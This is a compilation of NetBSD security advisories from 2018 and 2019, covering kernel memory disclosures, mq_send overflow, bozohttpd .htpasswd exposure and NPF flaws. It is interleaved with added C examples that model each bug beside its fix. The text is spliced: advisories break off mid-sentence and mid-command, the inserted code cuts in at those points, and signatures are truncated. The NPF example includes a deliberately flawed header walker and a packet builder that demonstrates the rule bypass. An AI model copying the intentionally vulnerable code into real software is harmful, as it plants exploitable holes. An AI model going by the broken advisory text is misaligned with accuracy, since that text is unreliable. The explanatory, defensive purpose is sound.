rebuild and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository.

The following instructions briefly summarise how to upgrade your
kernel.  In these instructions, replace:

        ARCH     with your architecture (from uname -m), and
        KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

        # cd src
        # cvs update -d -P sys/path/to/file.c
        # ./build.sh kernel=KERNCONF
        # mv /netbsd /netbsd.old
        # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
        # shutdown -r now

For more information on how to do this, see:

        http://www.NetBSD.org/docs/guide/en/chap-kernel.html


Thanks To
=========

Andy Nguyen for discovering and reporting the issue.


More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
        http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-003.txt.asc

Information about NetBSD and NetBSD security can be found at
        http://www.NetBSD.org/ and
        http://www.NetBSD.org/Security/ .


Copyright 2019, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2019-003.txt.asc,v 1.1 2019/05/03 01:33:37 christos Exp $
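The root cause and its remedy, as an added userland model rather than the kernel's ifconf() code: a struct with the same 0x90-byte layout as struct ifreq (16-byte name plus a 128-byte sockaddr_storage-sized union) is filled the way the Technical Details describe, copying only sa_len bytes of the address, once without and once with zeroing the struct first. Prior stack contents are simulated with a constructed 0xAA fill so the stale bytes that would reach userland can be counted; `model_ifreq`, `fill_ifreq_unsafe`, `fill_ifreq_safe`, `stale_bytes` and `leaked_for` are names of this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IFNAMSIZ 16
#define STALE    0xAA   /* constructed marker for "whatever the stack held before" */

/* Variable-length link-level address as in the sample output: sa_len 0x11. */
struct model_sockaddr { uint8_t sa_len; uint8_t sa_family; uint8_t sa_data[30]; };

/* Same layout as NetBSD's struct ifreq on the affected kernels: 0x90 bytes. */
struct model_ifreq {
	char    ifr_name[IFNAMSIZ];
	uint8_t ifr_space[128];   /* sockaddr_storage-sized union member */
};

/* Vulnerable pattern: only sa_len bytes of the address are written; the
 * rest of ifr_space keeps whatever the stack frame held before. */
void fill_ifreq_unsafe(struct model_ifreq *ifr, const char *name,
		       const struct model_sockaddr *sa)
{
	strncpy(ifr->ifr_name, name, IFNAMSIZ);
	memcpy(ifr->ifr_space, sa, sa->sa_len);
}

/* Fixed pattern: clear the whole struct before filling it, so a later
 * copyout() can only hand userland bytes that were deliberately written. */
void fill_ifreq_safe(struct model_ifreq *ifr, const char *name,
		     const struct model_sockaddr *sa)
{
	memset(ifr, 0, sizeof(*ifr));
	strncpy(ifr->ifr_name, name, IFNAMSIZ);
	memcpy(ifr->ifr_space, sa, sa->sa_len);
}

/* Count bytes still carrying the stale marker, i.e. what would leak. */
size_t stale_bytes(const struct model_ifreq *ifr)
{
	const uint8_t *p = (const uint8_t *)ifr;
	size_t n = 0;
	for (size_t i = 0; i < sizeof(*ifr); i++)
		n += (p[i] == STALE);
	return n;
}

/* One scenario on a "stack" pre-filled with the marker; returns the number
 * of stale bytes left in the struct (0 means nothing would leak). */
size_t leaked_for(int use_safe)
{
	struct model_ifreq ifr;
	struct model_sockaddr sa = { 0x11, 0x12, { 0 } };  /* sa_len 0x11, AF_LINK */

	memset(&ifr, STALE, sizeof(ifr));   /* simulate prior stack contents */
	if (use_safe)
		fill_ifreq_safe(&ifr, "wm0", &sa);
	else
		fill_ifreq_unsafe(&ifr, "wm0", &sa);
	return stale_bytes(&ifr);
}

int main(void)
{
	printf("sizeof(struct model_ifreq) = 0x%zx\n", sizeof(struct model_ifreq));
	printf("unsafe: %zu stale bytes would reach userland\n", leaked_for(0));
	printf("safe:   %zu stale bytes would reach userland\n", leaked_for(1));
	return 0;
}
```

The name field is zero-padded by strncpy in both variants, so the stale bytes counted here are the 128 - 0x11 bytes of the union that the unsafe path never writes.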
NetBSD Security Advisory 2019-002: Unprivileged kernel memory overwrite in mq_send(3)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		 NetBSD Security Advisory 2019-002
		 =================================

Topic:		Unprivileged kernel memory overwrite in mq_send(3)

Version:	NetBSD-current:	affected prior to April 16, 2019
		NetBSD 8.0:	affected
		NetBSD 7.2:	affected
		NetBSD 7.1.2:	affected
		NetBSD 7.0.2:	affected

Severity:	Local user may overwrite kernel memory

Fixed:		NetBSD-current:		April 16, 2019
		NetBSD-8 branch:	April 16, 2019
		NetBSD-7 branch:	April 16, 2019
		NetBSD-7-1 branch:	April 16, 2019
		NetBSD-7-0 branch:	April 16, 2019

Please note that NetBSD releases prior to 7.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

An unprivileged user can overwrite parts of kernel memory via an
unprivileged mq_send(3) system call.

Technical Details
=================

Insufficient argument validation in the mq_send(3) system call could cause
a copyin(9) operation of too much data, overrunning the kernel target
memory.

Solutions and Workarounds
=========================

Update the kernel to a fixed version and reboot.

To apply a fixed version from a releng build, fetch a fitting kern-GENERIC.tgz
from nyftp.netbsd.org and extract the fixed binaries:

	cd /var/tmp
	ftp https://nycdn.NetBSD.org/pub/NetBSD-daily/REL/latest/ARCH/binary/sets/kern-GENERIC.tgz
	cd /
	tar xzpf /var/tmp/kern-GENERIC.tgz

with the following replacements:

	REL  = the release version you are using
	ARCH = your system's architecture

The following instructions describe how to upgrade your kernel by updating
your source tree and rebuilding and installing a new version.

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and
install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The following
instructions briefly summarise how to upgrade your kernel. In these
instructions, replace:

	ARCH     with your architecture (from uname -m), and
	KERNCONF with the name of your kernel configuration file.

To update from CVS, re-build, and re-install the kernel:

	# cd src
	# cvs update -d -P sys/path/to/file.c
	# ./build.sh kernel=KERNCONF
	# mv /netbsd /netbsd.old
	# cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
	# shutdown -r now

For more information on how to do this, see:

	http://www.NetBSD.org/docs/guide/en/chap-kernel.html

Thanks To
=========

Andy Nguyen for discovering and reporting the issue.

More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2019-002.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/
  http://www.NetBSD.org/Security/

Copyright 2019, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.

$NetBSD: NetBSD-SA2019-002.txt.asc,v 1.1 2019/05/03 01:33:11 christos Exp $

-----BEGIN PGP SIGNATURE-----
iQIcBAEBAgAGBQJcy5pIAAoJEAZJc6xMSnBuJdAP/i4i5l3HefvFCUIYdt9YsVCW
gxQZ6mS/NAgsFS1tHpSYfBqLiYgSAg/uAu1Yo3snni1zQzKhKsZ+1QPalb+oe4AS
X+Vw9BXRWcBXCUBHpJS3vPEeg1pMWbQOpBQ0YxC0YVKVo6InWgovCDvUFdQ8hZzv
PGbxU7spVNTUJ5+x8/QQw9rJzAZfTRniymLEuRrmFmmn4xPN6KKmi8zhkRTgWEHO
AQl3mDVupSUbBID7pLY3FK7dyzbyAcoKptMow42g54Tgl445MiBos7gpVsIzXeAh
9rKwOceGHrzFYf8dawc7bWquxzZ5qH9udDv9XiGoFRCQUAbyGHnrZ9qNYGKgIf0m
1diFrBsLMroSAWLfI/6b7pCbvgXo1NCvePwomYPk1NoIqyVqPZ4YSmGy85aA1e5R
LYSmPHCPEMPxP5YPQq1KsXoFNpCUiu1JXoC6CEh28sUijxStSqcx4q29ZweJKzYy
PjBNb6FB+h+jDW3z8OzMDo0sYKZKUMaQStLmzqhvBH++zmYEQsKyL6glxdI5jMXr
ibW6uBh4nfo6F6d5ao66Cil3dOu1WBSqCgMa5VgyEjpFlAXrvSXHCAcSZDjfNd/V
11LQJvO73MYXSqf01SJ+UEmZqk/fMa3egOEMfBQZc0BoTMBpOzBkGN+ZYVI2ayNO
I00zzgJvkKRcWt2Uyqs9
=id0y
-----END PGP SIGNATURE-----
NetBSD Security Advisory 2019-001: Several kernel memory disclosure bugs
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		 NetBSD Security Advisory 2019-001
		 =================================

Topic:		Several kernel memory disclosure bugs

Version:	NetBSD-current:	source prior to Thu, Jan 31st 2019
		NetBSD 8.0:	affected
		NetBSD 7.2:	affected
		NetBSD 7.1:	affected
		NetBSD 7.0:	affected

Severity:	Kernel memory disclosure

Fixed:		NetBSD-current:		Thu, Jan 31st 2019
		NetBSD-8 branch:	Fri, Feb 1st 2019
		NetBSD-7-1 branch:	Fri, Feb 1st 2019
		NetBSD-7-0 branch:	Fri, Feb 1st 2019

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 7.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract & Technical Details
============================

Several kernel memory disclosure bugs were discovered:

 1) Four bytes of kernel stack were leaked in the ntp_gettime system call.
 2) Eight bytes of kernel stack were leaked when executing execve.
 3) Many bytes of kernel stack were leaked when processing signals on
    several architectures.
 4) Four bytes of kernel stack were leaked in several system calls
    related to time.
 5) An inverted logic in netbsd32 caused some kernel memory bytes to
    wrongfully be copied to userland.
 6) A missing sanity check in a sysctl caused a severe kernel memory
    disclosure.
 7) Four bytes of kernel stack were leaked in the kevent system call.
 8) Eight bytes of kernel stack were leaked in the gettimer system call.
 9) Two bytes of kernel heap were leaked in the net.rtable sysctl.
10) Many bytes of kernel stack were leaked in the swapctl system call.
11) Sixteen bytes of kernel heap were leaked in the settime system call.
12) Four bytes of kernel heap were leaked in the sigaction_sigtramp
    system call.
13) Many bytes of kernel stack were leaked in the ptrace system call.
14) Four bytes of kernel stack were leaked in the wait6 system call.
15) Four bytes of kernel stack were leaked in the sigtimedwait system call.
16) Many bytes of kernel stack were leaked in the msgctl system call
    implemented in the compatibility layers.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild
and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarize how to upgrade your kernel.

The patches can be obtained from NetBSD-current with the following commands:

ISSUE	COMMAND
-----	-------
 1)	cvs rdiff -u -r1.59 -r1.60 src/sys/kern/kern_ntptime.c
 2)	cvs rdiff -u -r1.461 -r1.462 src/sys/kern/kern_exec.c
 3)	cvs rdiff -u -r1.320 -r1.321 src/sys/arch/amd64/amd64/machdep.c
 3)	cvs rdiff -u -r1.2 -r1.3 src/sys/arch/aarch64/aarch64/netbsd32_machdep.c
 3)	cvs rdiff -u -r1.351 -r1.352 src/sys/arch/alpha/alpha/machdep.c
 3)	cvs rdiff -u -r1.116 -r1.117 src/sys/arch/amd64/amd64/netbsd32_machdep.c
 3)	cvs rdiff -u -r1.50 -r1.51 src/sys/arch/arm/arm/sig_machdep.c
 3)	cvs rdiff -u -r1.25 -r1.26 src/sys/arch/hppa/hppa/sig_machdep.c
 3)	cvs rdiff -u -r1.812 -r1.813 src/sys/arch/i386/i386/machdep.c
 3)	cvs rdiff -u -r1.49 -r1.50 src/sys/arch/m68k/m68k/sig_machdep.c
 3)	cvs rdiff -u -r1.15 -r1.16 src/sys/arch/mips/mips/netbsd32_machdep.c
 3)	cvs rdiff -u -r1.23 -r1.24 src/sys/arch/mips/mips/sig_machdep.c
 3)	cvs rdiff -u -r1.45 -r1.46 src/sys/arch/powerpc/powerpc/sig_machdep.c
 3)	cvs rdiff -u -r1.1 -r1.2 src/sys/arch/riscv/riscv/sig_machdep.c
 3)	cvs rdiff -u -r1.105 -r1.106 src/sys/arch/sh3/sh3/sh3_machdep.c
 3)	cvs rdiff -u -r1.288 -r1.289 src/sys/arch/sparc64/sparc64/machdep.c
 3)	cvs rdiff -u -r1.110 -r1.111 src/sys/arch/sparc64/sparc64/netbsd32_machdep.c
 3)	cvs rdiff -u -r1.7 -r1.8 src/sys/arch/usermode/target/i386/cpu_i386.c
 3)	cvs rdiff -u -r1.6 -r1.7 src/sys/arch/usermode/target/x86_64/cpu_x86_64.c
 3)	cvs rdiff -u -r1.22 -r1.23 src/sys/arch/vax/vax/sig_machdep.c
 4)	cvs rdiff -u -r1.189 -r1.190 src/sys/kern/kern_time.c
 4)	cvs rdiff -u -r1.193 -r1.194 src/sys/kern/kern_time.c
 5)	cvs rdiff -u -r1.47 -r1.48 src/sys/compat/netbsd32/netbsd32_socket.c
 6)	cvs rdiff -u -r1.218 -r1.219 src/sys/kern/kern_proc.c
 7)	cvs rdiff -u -r1.103 -r1.104 src/sys/kern/kern_event.c
 8)	cvs rdiff -u -r1.190 -r1.191 src/sys/kern/kern_time.c
 9)	cvs rdiff -u -r1.243 -r1.244 src/sys/net/rtsock.c
10)	cvs rdiff -u -r1.177 -r1.178 src/sys/uvm/uvm_swap.c
11)	cvs rdiff -u -r1.191 -r1.192 src/sys/kern/kern_time.c
11)	cvs rdiff -u -r1.109 -r1.110
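Most of the items above are small, fixed-size leaks of four or eight bytes, which is the size of the alignment padding an ABI inserts into a result structure that the kernel fills field by field and then copies out whole. The added example below (an illustration written for this page, not NetBSD kernel code) shows the mechanism with a user-space stand-in: a struct laid out on memory that still holds stale bytes, filled member by member, keeps those stale bytes in its padding, while clearing the whole object first removes the leak. `struct result` is an assumed layout chosen to have padding on LP64 targets, not the layout of any NetBSD structure, and the poison value stands in for whatever the kernel stack held.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * A kernel-to-user result object with an assumed layout (not any NetBSD
 * structure): on LP64 targets the 64-bit member forces 4 bytes of padding
 * after `state' and 4 more after `flags'.
 */
struct result {
	uint32_t state;
	uint64_t value;
	uint32_t flags;
};

#define POISON 0xA5	/* stands in for stale data left on the kernel stack */

/* Bytes of struct result that belong to no field: the candidates for a leak. */
size_t
result_padding_bytes(void)
{
	return sizeof(struct result)
	    - sizeof(((struct result *)0)->state)
	    - sizeof(((struct result *)0)->value)
	    - sizeof(((struct result *)0)->flags);
}

/*
 * Emulate a syscall handler that builds its result on a stack still holding
 * POISON, then count the bytes that would reach userland unchanged.
 * scrub != 0 applies the fix: clear the whole object before filling fields.
 */
size_t
leaked_bytes(int scrub)
{
	union {
		struct result r;
		unsigned char raw[sizeof(struct result)];
	} u;
	size_t i, leaked = 0;

	memset(u.raw, POISON, sizeof(u.raw));	/* what the stack held before */
	if (scrub)
		memset(&u.r, 0, sizeof(u.r));	/* the fix: one memset, no holes */
	u.r.state = 1;				/* member stores do not touch padding */
	u.r.value = 0x1122334455667788ULL;
	u.r.flags = 0;
	for (i = 0; i < sizeof(u.raw); i++)
		if (u.raw[i] == POISON)
			leaked++;
	return leaked;
}

int
main(void)
{
	printf("padding bytes in struct result: %zu\n", result_padding_bytes());
	printf("leaked without scrub: %zu, with scrub: %zu\n",
	    leaked_bytes(0), leaked_bytes(1));
	return 0;
}
```

Without the scrub, every padding byte leaks, which on an LP64 target is exactly the "four bytes" or "eight bytes" pattern the list above repeats; with it, none do. The same discipline applies to heap-allocated objects that are copied out, since kmem allocators do not clear memory either.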
NetBSD Security Advisory 2018-009: bozohttpd can allow access to .htpasswd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		 NetBSD Security Advisory 2018-009
		 =================================

Topic:		bozohttpd can allow access to .htpasswd

Version:	NetBSD-current:	prior to 2018-11-22
		NetBSD 8*:	affected
		NetBSD 7.2*:	affected
		NetBSD 7.1*:	affected
		pkgsrc:		bozohttpd package prior to 20181123

Severity:	Remote access to encrypted passwords and usernames

Fixed:		NetBSD-current:		November 21, 2018
		NetBSD-8 branch:	November 24, 2018
		NetBSD-7-2 branch:	November 24, 2018
		NetBSD-7-1 branch:	November 24, 2018
		pkgsrc-current:		bozohttpd-20181123 corrects this issue

Please note that NetBSD releases prior to 7.1 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Under certain circumstances bozohttpd(8) can be tricked into revealing the
contents of certain special files. These special files are configuration
files for bozohttpd(8) and include the standard .htpasswd file for HTTP
Basic Authorisation (RFC-7617), which contains both a list of user names
and their encrypted passwords.

Technical Details
=================

There were two problems in the handling of bozohttpd special files.

The first was a missing check against .htpasswd itself in some cases, which
allowed the encrypted passwords and user names for the top-level directory
to be read. An empty top-level directory name elided the check for any
special files. All requests now check special files.

The second was a lack of short circuit when the error was detected. The
error would be returned, but instead of closing the connection, the
contents of the requested file were also returned. This was caused by not
checking the return value of bozo_check_special_files(). This function is
now marked with the "warn_unused_result" attribute.

Solutions and Workarounds
=========================

Users of any bozohttpd(8) features using special files should upgrade to
bozohttpd 20181123 or later. There is no workaround except for not using
these features, which may mean simply disabling parts of the served tree
until the server is upgraded.

Consider changing all the passwords used in the .htpasswd, as they may be
compromised.

To apply a fixed version from a releng build, fetch a fitting base.tgz from
nyftp.netbsd.org and extract the fixed binaries:

	cd /var/tmp
	ftp http://nyftp.netbsd.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz
	cd /
	tar xzpf /var/tmp/base.tgz ./usr/libexec/httpd

with the following replacements:

	REL   = the release version you are using
	BUILD = the source date of the build. 20181125* and later will fit
	ARCH  = your system's architecture

The following instruct	ions describe how to upgrade your bozohttpd binaries
by updating your source tree and rebuilding and installing a new version of
bozohttpd.

* NetBSD-current:

	Systems running NetBSD-current dated from before 2018-11-21 should
	be upgraded to NetBSD-current dated 2018-11-22 or later.

	The following files/directories need to be updated from the
	netbsd-current CVS branch (aka HEAD):

		src/libexec/httpd

	To update from CVS, re-build, and re-install bozohttpd:

		# cd src
		# cvs update -d -P libexec/httpd
		# cd libexec/httpd
		# make USETOOLS=no cleandir dependall
		# make USETOOLS=no install

* NetBSD 8.*:

	Systems running NetBSD 8.* sources dated from before 2018-11-24
	should be upgraded from NetBSD 8.* sources dated 2018-11-25 or later.

	The following files/directories need to be updated from the
	netbsd-8 branch:

		src/libexec/httpd

	To update from CVS, re-build, and re-install bozohttpd:

		# cd src
		# cvs update -r netbsd-8 -d -P libexec/httpd
		# cd libexec/httpd
		# make USETOOLS=no cleandir dependall
		# make USETOOLS=no install

* NetBSD 7.*:

	Systems running NetBSD 7.* sources dated from before 2018-11-24
	should be upgraded from NetBSD 7.* sources dated 2018-11-25 or later.

	The following files/directories need to be updated from the
	netbsd-7, netbsd-7-2 or netbsd-7-1 branches:

		src/libexec/httpd

	To update from CVS, re-build, and re-install bozohttpd, with BRANCH
	replaced by netbsd-7, netbsd-7-2 or netbsd-7-1 as appropriate:

		# cd src
		# cvs update -r BRANCH -d -P libexec/httpd
		# cd libexec/httpd
		# make USETOOLS=no cleandir dependall
		# make USETOOLS=no install

Thanks To
=========

Thanks to JP for reporting this issue and helping find the problematic
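Both defects above, a check that is skipped when the top-level directory name is empty and an error return that is ignored so the file follows the error, show up in a path check written the way the fix requires. The example below is added here and is not bozohttpd's code; it assumes an exact name match against a list holding only `.htpasswd` (a deployment would add its other control files), and `check_special_files()` and `request_status()` are names chosen for this illustration.

```c
#include <string.h>

/*
 * Names the server must never serve. ".htpasswd" comes from the advisory;
 * the list is assumed to be extended with whatever other control files a
 * deployment relies on. Matching is exact per path component.
 */
static const char *const special_files[] = {
	".htpasswd",
	NULL
};

/*
 * Returns 1 if any component of `path' names a special file, else 0.
 * Every component is examined, the first one included: "/.htpasswd" and
 * "//.htpasswd" have an empty directory part and must not slip past.
 * warn_unused_result makes the compiler complain if a caller drops the
 * verdict, which is the second bug the advisory describes.
 */
__attribute__((warn_unused_result)) int
check_special_files(const char *path)
{
	const char *p = path;

	while (*p != '\0') {
		const char *start;
		size_t len, i;

		while (*p == '/')		/* skip separators, keep checking */
			p++;
		start = p;
		while (*p != '\0' && *p != '/')
			p++;
		len = (size_t)(p - start);
		if (len == 0)
			break;			/* trailing '/' or empty path */
		for (i = 0; special_files[i] != NULL; i++) {
			if (strlen(special_files[i]) == len &&
			    memcmp(start, special_files[i], len) == 0)
				return 1;
		}
	}
	return 0;
}

/*
 * Request handling with the short circuit the fix requires: once the
 * check fails, send the error and stop. Never fall through into the code
 * that would also send the file body.
 */
int
request_status(const char *path)
{
	if (check_special_files(path))
		return 403;		/* error sent, nothing else follows */
	return 200;			/* the file would be served here */
}
```

Requests for `/index.html` get 200; `/.htpasswd`, `//.htpasswd`, `/docs/.htpasswd` and `/.htpasswd/` all get 403 with nothing else on the wire.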
NetBSD Security Advisory 2018-008: Several vulnerabilities in NPF
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		 NetBSD Security Advisory 2018-008
		 =================================

Topic:		Several vulnerabilities in NPF

Version:	NetBSD-current:		source prior to Thu, Mar 22nd 2018
		NetBSD 7.1 - 7.1.2:	affected
		NetBSD 7.0 - 7.0.2:	affected
		NetBSD 6.1 - 6.1.5:	affected
		NetBSD 6.0 - 6.0.6:	affected

Severity:	Remote Rule Bypass, Remote Memory Corruption

Fixed:		NetBSD-current:		Thu, Mar 22nd 2018
		NetBSD-7-1 branch:	Mon, May 14th 2018
		NetBSD-7-0 branch:	Mon, May 14th 2018
		NetBSD-7 branch:	Mon, May 14th 2018
		NetBSD-6-1 branch:	Thu, May 17th 2018
		NetBSD-6-0 branch:	n/a
		NetBSD-6 branch:	Thu, May 17th 2018

Teeny versions released later than the fix date will contain the fix.

Please note that NetBSD releases prior to 6.0 are no longer supported.
It is recommended that all users upgrade to a supported release.

Abstract
========

Several vulnerabilities were discovered in NPF:

 1) Integer overflow when parsing IPv6 headers.
 2) Use-after-free when handling ICMP packets.

Issue 2 will not be fixed in the netbsd-6-0 branch.

Technical Details
=================

 1) An integer overflow could be triggered when NPF was parsing IPv6
    options of a packet. This overflow could result in a header length
    that was smaller than expected, which could allow an incoming packet
    to bypass L4 rules.

 2) A use-after-free could occur when NPF was parsing an ICMP packet. This
    could result in a rule bypass, a panic, or unexpected behavior.

Solutions and Workarounds
=========================

For all NetBSD versions, you need to obtain fixed kernel sources, rebuild
and install the new kernel, and reboot the system.

The fixed source may be obtained from the NetBSD CVS repository. The
following instructions briefly summarize how to upgrade your kernel. In
these instructions, replace:

	ARCH     with your architecture (from uname -m),
	KERNCONF with the name of your kernel configuration file and
	VERSION  with the file version below

File versions containing the fixes:

FILE                             HEAD    netbsd-7    netbsd-7-0    netbsd-7-1
----                             ----    --------    ----------    ----------
src/sys/net/npf/npf.h            1.55    1.47.2.1    1.47.6.1      1.47.12.1
src/sys/net/npf/npf_inet.c       1.45    1.32.2.3    1.32.6.1      1.32.10.1
src/sys/net/npf/npf_alg_icmp.c   1.29    1.23.2.1    1.23.6.1      1.23.12.1

FILE                             netbsd-6     netbsd-6-0      netbsd-6-1
----                             --------     ----------      ----------
src/sys/net/npf/npf.h            1.14.2.13    1.14.2.6.4.2    1.14.2.12.2.1
src/sys/net/npf/npf_inet.c       1.10.4.11    n/a             1.10.4.9.2.2
src/sys/net/npf/npf_alg_icmp.c   1.8.4.8      n/a             1.8.4.7.2.1

To update from CVS, re-build, and re-install the kernel:

	# cd src
	# cvs update -d -P -r VERSION sys/net/npf/npf.h
	# cvs update -d -P -r VERSION sys/net/npf/npf_inet.c
	# cvs update -d -P -r VERSION sys/net/npf/npf_alg_icmp.c
	# ./build.sh kernel=KERNCONF
	# mv /netbsd /netbsd.old
	# cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd
	# shutdown -r now

For more information on how to do this, see:

	http://www.NetBSD.org/guide/en/chap-kernel.html

Thanks To
=========

Maxime Villard for finding and fixing these issues.

Revision History
================

	2018-05-24	Initial release

More Information
================

Advisories may be updated as new information becomes available.

The most recent version of this advisory (PGP signed) can be found at
  http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2018-008.txt.asc

Information about NetBSD and NetBSD security can be found at
  http://www.NetBSD.org/
  http://www.NetBSD.org/Security/

Copyright 2018, The NetBSD Foundation, Inc.  All Rights Reserved.
Redistribution permitted only in full, unmodified form.
-----BEGIN PGP SIGNATURE-----
iQIcBAEBAgAGBQJbBxHeAAoJEAZJc6xMSnBuCE4QAITWmvcJpv8dANlmBQWElzs7
XRah2CrpujfXeSVuocay80QpTwQTn6Hm4ZAlkYZBlwBVqepPjpwcdb5LmWHzwFgK
33oN/YO7tu/9HFgR9qHHyAnEPT3v7QHxomHgPGPDkAksMOJEj7Mjs0oZQaSiCeoU
DF2VG+CNesIajJIz5WJDk+EE0G2YFOvkXYKWT26Ei1qUqeEYgfkK5E+ZGxE0rnE6
IVqubBIoNTmKvnsrv8uGKiQaau5iC2cztsZuCYsDwydYSNxXh5f/c9bfjpghaBw6
G8+3I9P2XGiNnP9wiyffpryktV1aUqtXFOeFjXKdPqmPscXnTWVtGYhPzyluG5Cv
4Led6qGvAzeB+TVHgjFc6pQVPkIyHF3lU4fQmfc3HZ1rsK7kEcGKVYwqCCnH7+jR
NABVdzFmEqp4BDm+6JhPQvmi4iB8tTXXjIUWPQSGjkBBo0dQTC+Fom4m8zVF+/fe
OqjslnTCw1fDO7byk19gsFXqR1fVOQ0qiVP55e3HKTyq1Y5gNpANJn8im5GOaBto
AbGbTfwq/w6nb6nVi2c9J14HOf36FC+ynFltF7IH/F5lFowwQORs3RSLmXgSTGjk
cFBpKt4IwfoYdPFBgBxkgoH+WNBmn7FoZWCa8b8mIEONyQNPH7+DiKzkcioj3Ttr
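Issue 1 of the NPF advisory above is a length computation that wraps so the layer-4 header is looked for too early in the packet. The added example below (written for this page, not NPF's code) walks an IPv6 extension-header chain twice: once with size_t arithmetic bounded by the packet length at every step, and once with an 8-bit running offset standing in for the bug class, so that a Hop-by-Hop header of 2048 bytes makes the second walker report the TCP header at offset 40, inside option data the sender controls. The packet builder, the sample packet and the function names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <netinet/in.h>		/* IPPROTO_HOPOPTS, IPPROTO_DSTOPTS, ... */

#define IP6_HDRLEN 40
#define TCP_HDRLEN 20

/*
 * Hardened walk. Returns the byte offset of the layer-4 header, or -1 if a
 * header runs past the packet. Offsets live in size_t and are checked
 * against `len' before every step, so nothing wraps; depth is capped.
 */
long
ip6_l4_offset(const uint8_t *pkt, size_t len, uint8_t *l4proto)
{
	size_t off = IP6_HDRLEN, hlen;
	uint8_t nxt;
	int depth = 0;

	if (len < IP6_HDRLEN || (pkt[0] >> 4) != 6)
		return -1;
	nxt = pkt[6];
	for (;;) {
		switch (nxt) {
		case IPPROTO_HOPOPTS:
		case IPPROTO_DSTOPTS:
		case IPPROTO_ROUTING:
			if (len - off < 2)
				return -1;	/* need next-header + length bytes */
			hlen = ((size_t)pkt[off + 1] + 1) * 8;
			break;
		case IPPROTO_FRAGMENT:
			if (len - off < 8)
				return -1;
			hlen = 8;
			break;
		default:
			*l4proto = nxt;
			return (long)off;
		}
		if (hlen > len - off)
			return -1;		/* header claims bytes the packet lacks */
		nxt = pkt[off];
		off += hlen;
		if (++depth > 8)
			return -1;
	}
}

/*
 * The bug class: a running offset too narrow for the values it must hold.
 * 40 + 2048 wraps to 40, so the "L4 header" is then taken from inside the
 * option data, where the sender chooses every byte (ports included).
 */
long
ip6_l4_offset_naive(const uint8_t *pkt, uint8_t *l4proto)
{
	uint8_t off = IP6_HDRLEN;		/* 8 bits: the defect */
	uint8_t nxt = pkt[6];
	int depth = 0;

	while ((nxt == IPPROTO_HOPOPTS || nxt == IPPROTO_DSTOPTS ||
	    nxt == IPPROTO_ROUTING) && depth++ < 8) {
		unsigned hlen = ((unsigned)pkt[off + 1] + 1) * 8;
		nxt = pkt[off];
		off += hlen;			/* silently truncated */
	}
	*l4proto = nxt;
	return off;
}

/* Constructed sample: IPv6 + one Hop-by-Hop header with length field
 * `hbh_len' ((hbh_len + 1) * 8 bytes) + a zeroed TCP header. */
size_t
build_hbh_packet(uint8_t *buf, size_t cap, uint8_t hbh_len)
{
	size_t payload = ((size_t)hbh_len + 1) * 8 + TCP_HDRLEN;
	size_t total = IP6_HDRLEN + payload;

	if (total > cap)
		return 0;
	memset(buf, 0, total);
	buf[0] = 0x60;				/* version 6 */
	buf[4] = (uint8_t)(payload >> 8);	/* payload length */
	buf[5] = (uint8_t)payload;
	buf[6] = IPPROTO_HOPOPTS;
	buf[IP6_HDRLEN] = IPPROTO_TCP;		/* HBH: next header */
	buf[IP6_HDRLEN + 1] = hbh_len;		/* HBH: 8-octet units minus one */
	return total;
}

static uint8_t demo_pkt[2200];

/* Offsets each walker reports; `cut' < 0 passes the true length. */
long
demo_hardened(uint8_t hbh_len)
{
	uint8_t proto = 0;
	size_t n = build_hbh_packet(demo_pkt, sizeof(demo_pkt), hbh_len);
	return n ? ip6_l4_offset(demo_pkt, n, &proto) : -1;
}

long
demo_naive(uint8_t hbh_len)
{
	uint8_t proto = 0;
	size_t n = build_hbh_packet(demo_pkt, sizeof(demo_pkt), hbh_len);
	return n ? ip6_l4_offset_naive(demo_pkt, &proto) : -1;
}

/* Hardened walker handed fewer bytes than the HBH header claims. */
long
demo_truncated(uint8_t hbh_len)
{
	uint8_t proto = 0;
	size_t n = build_hbh_packet(demo_pkt, sizeof(demo_pkt), hbh_len);
	return n ? ip6_l4_offset(demo_pkt, IP6_HDRLEN + 4, &proto) : -1;
}
```

For a 2048-byte Hop-by-Hop header the hardened walker reports the TCP header at 2088 while the 8-bit walker reports 40; a firewall that trusted the second value would match its TCP rules against attacker-supplied option bytes, which is the rule bypass the advisory describes.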
NetBSD Security Advisory 2018-007: Several vulnerabilities in IPsec
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

		 NetBSD Security Advisory 2018-007
		 =================================

Topic:		Several vulnerabilities in IPsec

Version:	NetBSD-current:		source prior to Tue, May 1st 2018
